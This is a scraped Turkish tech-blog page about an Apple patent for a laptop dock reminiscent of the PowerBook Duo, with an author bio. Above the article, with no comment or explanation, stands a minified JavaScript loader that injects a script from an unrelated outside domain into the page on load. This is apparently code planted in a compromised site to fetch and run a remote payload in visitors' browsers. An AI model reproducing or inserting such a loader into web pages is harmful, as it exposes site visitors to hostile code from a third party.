;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PowerBook Duo 'lar Geri Mi Dönüyor? - elmasuyu.net
Kategoriler
Apple Genel Güncelleme Haber Teknik

PowerBook Duo ‘lar Geri Mi Dönüyor?

Uzun yıllar boyunca taşınabilir sektörünün öncüsü olan Apple zamanında taşınabilir bilgisayarları daha kullanışlı bir masaüstü bilgisayarı haline getirmenin yolunu PowerBook Duo serisi ile bizlere sunmuştu. Yıllar önce bu modelleri kaldıran Apple galiba taşınabilir bilgisayarları artık aynı mantıkta kullanmaya karar verdi. 

Apple’ın Patent bürosunu yaptığı son başvuruların birinde iMac’e benzeyen bir ekranlı kasanın arkasına yerleştirilebilecek bir rıhtım (dock) sayesinde taşınabilir bilgisayarınızı masaüstü bilgisayar olarak da kullanabileceksiniz. Pantent ayrısa sıvı soğutma sistemini ve yeni bir ses aygıtını da içermekte. Bakalım gelişmeler bize neyi gösterecek?

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner